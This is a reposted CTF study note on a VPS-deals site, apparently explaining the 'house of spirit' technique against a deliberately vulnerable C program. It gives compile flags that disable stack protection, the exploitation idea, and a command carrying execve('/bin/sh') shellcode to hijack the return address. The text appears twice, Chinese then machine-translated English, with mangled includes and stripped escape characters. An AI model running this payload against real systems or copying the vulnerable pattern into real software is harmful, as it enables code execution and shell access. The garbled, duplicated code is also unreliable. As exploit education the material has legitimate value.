主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情! |
我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作 |
学习了一下L-CTF中介绍的一个栈溢出利用技巧,记录一下。
样例代码如下:
/*
* blackngel's vulnerable program slightly modified by gb_master
*/
#include <stdio.hgt;
#include <string.hgt;
#include <stdlib.hgt;
void fvuln(char *str1, int age)
{
char *ptr1, name[32];
int local_age;
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("nPTR1 = [ %p ]n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("n%sn", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
编译命令如下:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
Ubuntu 14 Server里编译需要安装一下开发包,否则会报错sys/cdefs.h文件找不到:
sudo apt-get install libc6-dev-i386
这里关键思路是:通过溢出修改局部变量的地址为栈中的一个地址,将伪造地址中的size字段设置成一个fastbin的有效大小,以便能成功将其free,后面的malloc将把此块内存重新申请并使用,snprintf函数再向其中写入数据,从而可以覆盖函数返回地址,最终getshell。
局部变量的内存分布如下:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
样例测试命令如下:
./hos `python -c 'import sys; sys.stdout.write("x31xc0xebx14x44xd0xffxffx6ax0bx58x31xf6x56x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcaxcdx80x90" + "x01x01x01x68xd0xFFxFF" + "x30")'` 48
这里有点问题,通过GDB调试可以getshell,直接执行则报段错误:
Learn a stack overflow utilization technique introduced in l-ctf and record it.
The sle code is as follows:
/ *
* blackngel's vulnerable program slightly modified by gb_master
* /
#include <stdio.hgt;
#include <string.hgt;
#include <stdlib.hgt;
void fvuln(char *str1, int age)
{
char *ptr1, name[32];
int local_age;
char *ptr2;
local_age = age;
ptr1 = (char *) malloc(256);
printf("nPTR1 = [ %p ]", ptr1);
strcpy(name, str1);
printf("nPTR1 = [ %p ]n", ptr1);
free(ptr1);
ptr2 = (char *) malloc(40);
snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
printf("n%sn", ptr2);
}
int main(int argc, char *argv[])
{
int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
if (argc == 3)
fvuln(argv[1], atoi(argv[2]));
return 0;
}
The compile command is as follows:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
To compile in Ubuntu 14 server, you need to install the following development package. Otherwise, an error will be reported. The sys / cdefs. H file cannot be found:
sudo apt-get install libc6-dev-i386
The key idea here is: change the address of local variable to an address in the stack through overflow, set the size field in the forged address to an effective size of fastbin, so that it can be free successfully, and malloc will reapply and use this block of memory, and snprintf function will write data to it, so that the return address of the function can be overwritten, and finally get shell.
The memory distribution of local variables is as follows:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
The sle test command is as follows:
./hos `python -c 'import sys; sys.stdout.write("x31xc0xebx14x44xd0xffxffx6ax0bx58x31xf6x56x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x89xcaxcdx80x90" + "x01x01x01x68xd0xFFxFF" + "x30")'` 48
There is a problem here. You can get the shell through GDB debugging. If you execute directly, a segment error will be reported:
--------------------------------------------------------------
主机参考,收集国内外VPS,VPS测评,主机测评,云服务器,虚拟主机,独立服务器,国内外服务器,高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外VPS主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器VPS参考测评资讯优惠信息分享平台
这几篇文章你可能也喜欢:
- CSTserver 宣传香港/美国优化线路云服务器为 2.2 美元/月,裸机为 19.9 美元/月,高防御为 30 美元/月,10G 高带宽为 39 美元/月,站点组为 105 美元/月。
- DesiVPS 推出全新 AMD Ryzen9+NVMe 系列 VPS,起价每年 24 美元,圣何塞机房
- 华纳云双11超值购买,香港云主机4H4G5M,每年支付888元送1年免费.com域名
- Mondoze:住宅IP/原生IP/IDC IP,VPS低至$8.33/马来西亚服务器/AS152742/11.11促销
- torchbyte 罗马尼亚 VPS 起价为 20 美元/年,AMD Ryzen9+ NVMe 硬盘,免费 DDoS 防护
本文由主机参考刊发,转载请注明:【溢出利用技巧】house of spirit friendly stack overflow https://zhujicankao.com/12451.html
评论前必须登录!
注册